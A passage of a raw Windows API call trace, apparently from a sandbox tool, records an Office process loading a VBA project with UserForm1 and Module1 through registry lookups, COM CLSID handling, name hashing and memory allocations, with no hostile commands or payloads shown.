[6]=0x4a, [7]=0x4f))) returned 0x0 [0041.195] lstrcpynA (in: lpString1=0x187610, lpString2="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", iMaxLength=256 | out: lpString1="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}" [0041.196] lstrcpynA (in: lpString1=0x187510, lpString2="UserForm1", iMaxLength=256 | out: lpString1="UserForm1") returned="UserForm1" [0041.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187610, cbMultiByte=-1, lpWideCharStr=0x187310, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0041.196] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x187370 | out: pclsid=0x187370*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0041.196] SetCursor (hCursor=0x10007) returned 0x10007 [0041.196] CoCreateGuid (in: pguid=0x1871b0 | out: pguid=0x1871b0*(Data1=0x5b1bd060, Data2=0xbe9e, Data3=0x44d3, Data4=([0]=0xbc, [1]=0xaa, [2]=0x26, [3]=0x7f, [4]=0x32, [5]=0x90, [6]=0xdf, [7]=0xbb))) returned 0x0 [0041.196] CoCreateGuid (in: pguid=0x187210 | out: pguid=0x187210*(Data1=0x2227179, Data2=0x24af, Data3=0x476c, Data4=([0]=0x82, [1]=0x65, [2]=0x83, [3]=0x76, [4]=0x3, [5]=0x4a, [6]=0x28, [7]=0x2a))) returned 0x0 [0041.196] CoCreateGuid (in: pguid=0x1871f0 | out: pguid=0x1871f0*(Data1=0x38c6277d, Data2=0x9f57, Data3=0x4e28, Data4=([0]=0xa5, [1]=0x97, [2]=0x81, [3]=0xea, [4]=0xaf, [5]=0x6e, [6]=0xfa, [7]=0x8f))) returned 0x0 [0041.196] CoCreateGuid (in: pguid=0x1871e0 | out: pguid=0x1871e0*(Data1=0x1683e399, Data2=0xb537, Data3=0x46d4, Data4=([0]=0x98, [1]=0xc6, [2]=0x54, [3]=0x34, [4]=0x90, [5]=0x8a, [6]=0xb7, [7]=0x84))) returned 0x0 [0041.196] CoCreateGuid (in: pguid=0x187220 | out: pguid=0x187220*(Data1=0x31fbe1d2, Data2=0xa450, Data3=0x4e80, Data4=([0]=0x9e, [1]=0x33, [2]=0xfa, [3]=0x8f, [4]=0xed, [5]=0x1, [6]=0xe, [7]=0x42))) returned 0x0 [0041.196] OleRegGetMiscStatus (in: clsid=0x187370*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f)), dwAspect=0x1, pdwStatus=0x186fb8 | out: pdwStatus=0x186fb8) returned 0x0 [0041.198] lstrcpyA (in: lpString1=0x186ee0, lpString2="CLSID\\" | out: lpString1="CLSID\\") returned="CLSID\\" [0041.198] StringFromGUID2 (in: rguid=0x187370*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f)), lpsz=0x6ba43f8, cchMax=122 | out: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0041.198] lstrcatA (in: lpString1="CLSID\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpString2="\\DesignerFeatures" | out: lpString1="CLSID\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\DesignerFeatures") returned="CLSID\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\DesignerFeatures" [0041.198] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="CLSID\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\DesignerFeatures", phkResult=0x186ed0 | out: phkResult=0x186ed0*=0x0) returned 0x2 [0041.198] ProgIDFromCLSID (in: clsid=0x187370*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f)), lplpszProgID=0x186fa0 | out: lplpszProgID=0x186fa0*="Forms.Form.1") returned 0x0 [0041.202] IMalloc:Alloc (This=0x7feffc15380, cb=0x19) returned 0x68e99a0 [0041.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Forms.Form.1", cchWideChar=-1, lpMultiByteStr=0x68e99a0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Forms.Form.1", lpUsedDefaultChar=0x0) returned 13 [0041.202] lstrlenA (lpString="Forms.Form.1") returned 12 [0041.202] IMalloc:Realloc (This=0x7feffc15380, pv=0x68e99a0, cb=0xd) returned 0x6c322d0 [0041.202] IMalloc:Free (This=0x7feffc15380, pv=0x68e9a30) [0041.202] lstrcpyA (in: lpString1=0x186fc0, lpString2="Form" | out: lpString1="Form") returned="Form" [0041.202] IMalloc:Free (This=0x7feffc15380, pv=0x6c322d0) [0041.203] StringFromGUID2 (in: rguid=0x274bcb8*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f)), lpsz=0x6c1ddb8, cchMax=40 | out: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0041.203] wsprintfA (in: param_1=0x186ec0, param_2="%s%s%s%s%s" | out: param_1="Clsid\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\InprocServer32") returned 59 [0041.203] RegOpenKeyExA (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\InprocServer32", ulOptions=0x0, samDesired=0x20019, phkResult=0x186e98 | out: phkResult=0x186e98*=0xa12) returned 0x0 [0041.203] RegQueryValueExA (in: hKey=0xa12, lpValueName="ThreadingModel", lpReserved=0x0, lpType=0x0, lpData=0x186ea0, lpcbData=0x186e90*=0x14 | out: lpType=0x0, lpData=0x186ea0*=0x41, lpcbData=0x186e90*=0xa) returned 0x0 [0041.204] lstrcmpiA (lpString1="Apartment", lpString2="Apartment") returned 0 [0041.204] lstrcmpiA (lpString1="Apartment", lpString2="Free") returned -1 [0041.204] lstrcmpiA (lpString1="Apartment", lpString2="Both") returned -1 [0041.204] RegCloseKey (hKey=0xa12) returned 0x0 [0041.204] CoCreateGuid (in: pguid=0x274bd14 | out: pguid=0x274bd14*(Data1=0x944fe032, Data2=0x7e4c, Data3=0x457d, Data4=([0]=0x8a, [1]=0xfc, [2]=0x40, [3]=0x3c, [4]=0x98, [5]=0xcf, [6]=0x9d, [7]=0x1))) returned 0x0 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Name") returned 0x10f2f0 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Caption") returned 0x107810 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Left") returned 0x107be5 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Top") returned 0x10da35 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Width") returned 0x104e68 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Height") returned 0x108b7c [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Enabled") returned 0x10aadb [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.204] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="OleObjectBlob") returned 0x1098c2 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Visible") returned 0x10d3b6 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Tag") returned 0x10d826 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="HelpContextID") returned 0x102275 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientLeft") returned 0x104925 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientTop") returned 0x109869 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientWidth") returned 0x1028e4 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientHeight") returned 0x107da9 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.205] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="WhatsThisButton") returned 0x104418 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="WhatsThisHelp") returned 0x103fe5 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="RightToLeft") returned 0x10e0c6 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="StartUpPosition") returned 0x10fb67 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ShowModal") returned 0x109408 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="TypeInfoVer") returned 0x107334 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Move") returned 0x10793e [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Show") returned 0x10f50f [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Hide") returned 0x107a39 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="PrintForm") returned 0x101f14 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="WhatsThisMode") returned 0x105081 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Resize") returned 0x103440 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="QueryClose") returned 0x10f454 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Activate") returned 0x107c97 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Deactivate") returned 0x10ae6a [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Initialize") returned 0x104ed3 [0041.206] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Terminate") returned 0x104c79 [0041.208] StringFromGUID2 (in: rguid=0x187370*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f)), lpsz=0x3ea0b88, cchMax=256 | out: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0041.208] wsprintfA (in: param_1=0x186fd0, param_2="%s%s%s%s%s" | out: param_1="Clsid\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\Instance CLSID") returned 59 [0041.208] RegQueryValueA (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\Instance CLSID", lpData=0x186ed0, lpcbData=0x186ec0 | out: lpData="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpcbData=0x186ec0) returned 0x2 [0041.209] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Forms.Form") returned 0x101727 [0041.209] lstrcmpiA (lpString1="Forms.Form", lpString2="Control") returned 1 [0041.209] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Forms.Form") returned 0x101727 [0041.209] lstrlenA (lpString="UserForm1") returned 9 [0041.209] lstrcmpiA (lpString1="Begin", lpString2="Caption") returned -1 [0041.209] lstrcmpiA (lpString1="End", lpString2="Caption") returned 1 [0041.209] lstrcpynA (in: lpString1=0x187710, lpString2="Caption", iMaxLength=256 | out: lpString1="Caption") returned="Caption" [0041.209] lstrcmpiA (lpString1="Begin", lpString2="ClientHeight") returned -1 [0041.209] lstrcmpiA (lpString1="End", lpString2="ClientHeight") returned 1 [0041.210] lstrcpynA (in: lpString1=0x187710, lpString2="ClientHeight", iMaxLength=256 | out: lpString1="ClientHeight") returned="ClientHeight" [0041.210] lstrcmpiA (lpString1="Begin", lpString2="ClientLeft") returned -1 [0041.210] lstrcmpiA (lpString1="End", lpString2="ClientLeft") returned 1 [0041.210] lstrcpynA (in: lpString1=0x187710, lpString2="ClientLeft", iMaxLength=256 | out: lpString1="ClientLeft") returned="ClientLeft" [0041.210] lstrcmpiA (lpString1="Begin", lpString2="ClientTop") returned -1 [0041.210] lstrcmpiA (lpString1="End", lpString2="ClientTop") returned 1 [0041.210] lstrcpynA (in: lpString1=0x187710, lpString2="ClientTop", iMaxLength=256 | out: lpString1="ClientTop") returned="ClientTop" [0041.210] lstrcmpiA (lpString1="Begin", lpString2="ClientWidth") returned -1 [0041.210] lstrcmpiA (lpString1="End", lpString2="ClientWidth") returned 1 [0041.210] lstrcpynA (in: lpString1=0x187710, lpString2="ClientWidth", iMaxLength=256 | out: lpString1="ClientWidth") returned="ClientWidth" [0041.210] lstrcmpiA (lpString1="Begin", lpString2="StartUpPosition") returned -1 [0041.210] lstrcmpiA (lpString1="End", lpString2="StartUpPosition") returned -1 [0041.210] lstrcpynA (in: lpString1=0x187710, lpString2="StartUpPosition", iMaxLength=256 | out: lpString1="StartUpPosition") returned="StartUpPosition" [0041.211] lstrcmpiA (lpString1="Begin", lpString2="TypeInfoVer") returned -1 [0041.211] lstrcmpiA (lpString1="End", lpString2="TypeInfoVer") returned -1 [0041.211] lstrcpynA (in: lpString1=0x187710, lpString2="TypeInfoVer", iMaxLength=256 | out: lpString1="TypeInfoVer") returned="TypeInfoVer" [0041.211] lstrcmpiA (lpString1="Begin", lpString2="End") returned -1 [0041.211] lstrcmpiA (lpString1="End", lpString2="End") returned 0 [0041.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187610, cbMultiByte=-1, lpWideCharStr=0x187340, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0041.211] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x187390 | out: pclsid=0x187390*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0041.211] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.211] lstrcmpiA (lpString1="UserForm1", lpString2="Control") returned 1 [0041.211] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.211] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.211] lstrlenA (lpString="UserForm1") returned 9 [0041.211] lstrcpyA (in: lpString1=0x274c005, lpString2="UserForm1" | out: lpString1="UserForm1") returned="UserForm1" [0041.211] lstrcmpiA (lpString1="End", lpString2="End") returned 0 [0041.211] CExposedDocFile::Release () returned 0x1 [0041.211] lstrcmpiA (lpString1="UserForm1", lpString2="UserForm1") returned 0 [0041.211] lstrlenA (lpString="UserForm1") returned 9 [0041.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2747d39, cbMultiByte=-1, lpWideCharStr=0x187920, cchWideChar=10 | out: lpWideCharStr="UserForm1") returned 10 [0041.211] lstrcpyA (in: lpString1=0x2748b00, lpString2="" | out: lpString1="") returned="" [0041.211] lstrcmpiA (lpString1="Module1", lpString2="Module1") returned 0 [0041.211] lstrlenA (lpString="Module1") returned 7 [0041.212] atoi (_Str="393222000") returned 393222000 [0041.212] lstrcpynA (in: lpString1=0x4ddcb2c, lpString2="{6DFCDF8E-FCE8-4AA7-B3DC-93B91ED47463}", iMaxLength=39 | out: lpString1="{6DFCDF8E-FCE8-4AA7-B3DC-93B91ED47463}") returned="{6DFCDF8E-FCE8-4AA7-B3DC-93B91ED47463}" [0041.212] StringFromGUID2 (in: rguid=0x7fee45c78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lpsz=0x6c1ddb8, cchMax=39 | out: lpsz="{00000000-0000-0000-0000-000000000000}") returned 39 [0041.212] lstrcmpA (lpString1="{00000000-0000-0000-0000-000000000000}", lpString2="{6DFCDF8E-FCE8-4AA7-B3DC-93B91ED47463}") returned -1 [0041.212] lstrlenA (lpString="{6DFCDF8E-FCE8-4AA7-B3DC-93B91ED47463}") returned 38 [0041.212] lstrlenA (lpString="{6DFCDF8E-FCE8-4AA7-B3DC-93B91ED47463}") returned 38 [0041.212] lstrlenA (lpString="{6DFCDF8E-FCE8-4AA7-B3DC-93B91ED47463}") returned 38 [0041.213] CExposedStream::Commit () returned 0x0 [0041.213] CExposedStream::Release () returned 0x0 [0041.213] CExposedDocFile::OpenStream () returned 0x80030002 [0041.213] lstrcmpiA (lpString1="Host Extender Info", lpString2="Host Extender Info") returned 0 [0041.213] lstrcmpiA (lpString1="Host Extender Info", lpString2="Host Extender Info") returned 0 [0041.213] lstrcmpiA (lpString1="&H00000001", lpString2="&H00000001") returned 0 [0041.214] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-90B92BEC6268};VBE;&H00000000") returned 53 [0041.214] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-90B92BEC6268};VBE;&H00000000") returned 53 [0041.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2748ae0, cbMultiByte=-1, lpWideCharStr=0x187990, cchWideChar=39 | out: lpWideCharStr="{3832D640-CF90-11CF-8E43-90B92BEC6268}") returned 39 [0041.214] CLSIDFromString (in: lpsz="{3832D640-CF90-11CF-8E43-90B92BEC6268}", pclsid=0x2749b0c | out: pclsid=0x2749b0c*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x90, [3]=0xb9, [4]=0x2b, [5]=0xec, [6]=0x62, [7]=0x68))) returned 0x0 [0041.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2748b07, cbMultiByte=-1, lpWideCharStr=0x187980, cchWideChar=4 | out: lpWideCharStr="VBE") returned 4 [0041.214] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0041.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f0158, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0041.214] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0041.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f0158, cbMultiByte=8, lpWideCharStr=0x68f12f8, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0041.214] lstrlenA (lpString="Project") returned 7 [0041.214] GetCurrentThreadId () returned 0x8c0 [0041.214] GetCurrentThreadId () returned 0x8c0 [0041.214] IMalloc:Alloc (This=0x7feffc15380, cb=0x28) returned 0x68e97f0 [0041.214] GetCursorPos (in: lpPoint=0x187b60 | out: lpPoint=0x187b60*(x=1018, y=358)) returned 1 [0041.214] GetCapture () returned 0x0 [0041.214] WindowFromPoint (Point=0x166000003fa) returned 0x50024 [0041.215] GetWindowThreadProcessId (in: hWnd=0x50024, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8c0 [0041.215] SendMessageA (hWnd=0x50024, Msg=0x84, wParam=0x0, lParam=0x16603fa) returned 0x1 [0041.215] SendMessageA (hWnd=0x50024, Msg=0x20, wParam=0x50024, lParam=0x2000001) returned 0x0 [0041.218] SetCursor (hCursor=0x10007) returned 0x10007 [0041.219] GetCurrentThreadId () returned 0x8c0 [0041.219] GetCurrentThreadId () returned 0x8c0 [0041.219] CExposedDocFile::CreateStorage () returned 0x0 [0041.220] IMalloc:Alloc (This=0x7feffc15380, cb=0x280) returned 0x6c24980 [0041.220] IMalloc:Alloc (This=0x7feffc15380, cb=0x1738) returned 0x6ca73d0 [0041.220] GetLocalTime (in: lpSystemTime=0x187388 | out: lpSystemTime=0x187388*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x2ca)) [0041.220] _ultow_s (in: _Value=0x5de83298, _Buffer=0x6c249aa, _BufferCount=0x103, _Radix=16 | out: _Buffer="5de83298") returned 0x0 [0041.220] wcsncpy_s (in: _Destination=0x187050, _SizeInWords=0x108, _Source="*\\Z045de83298", _MaxCount=0x106 | out: _Destination="*\\Z045de83298") returned 0x0 [0041.220] CharLowerBuffW (in: lpsz="*\\Z045de83298", cchLength=0xd | out: lpsz="*\\z045de83298") returned 0xd [0041.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045de83298", cchWideChar=14, lpMultiByteStr=0x186f80, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045de83298", lpUsedDefaultChar=0x0) returned 14 [0041.220] _wcsicmp (_String1="*\\Z045de83298", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation") returned 19 [0041.220] wcscpy_s (in: _Destination=0x6bd3ae0, _SizeInWords=0xe, _Source="*\\Z045de83298" | out: _Destination="*\\Z045de83298") returned 0x0 [0041.220] wcsncpy_s (in: _Destination=0x187090, _SizeInWords=0x108, _Source="*\\Z045de83298", _MaxCount=0x106 | out: _Destination="*\\Z045de83298") returned 0x0 [0041.220] CharLowerBuffW (in: lpsz="*\\Z045de83298", cchLength=0xd | out: lpsz="*\\z045de83298") returned 0xd [0041.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045de83298", cchWideChar=14, lpMultiByteStr=0x186fc0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045de83298", lpUsedDefaultChar=0x0) returned 14 [0041.220] CExposedDocFile::AddRef () returned 0x2 [0041.220] CExposedDocFile::AddRef () returned 0x2 [0041.220] IMalloc:Alloc (This=0x7feffc15380, cb=0x84) returned 0x6b9f3a0 [0041.220] wcscpy_s (in: _Destination=0x6b9f410, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0041.220] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x180) returned 0x6ada290 [0041.220] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0da60 [0041.220] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0d9a0 [0041.220] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6a7e170 [0041.220] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x80) returned 0x6b9f550 [0041.220] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6ca5400 [0041.220] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6ca5650 [0041.220] IMalloc:Alloc (This=0x7feffc15380, cb=0x28) returned 0x68e9760 [0041.220] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x68a2ed0 [0041.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x186cfc, cchData=6 | out: lpLCData="1252") returned 5 [0041.220] atoi (_Str="1252") returned 1252 [0041.220] GetLocalTime (in: lpSystemTime=0x186cf0 | out: lpSystemTime=0x186cf0*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x2ca)) [0041.220] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f5e0 [0041.220] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13fd0 [0041.220] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f670 [0041.221] IMalloc:Alloc 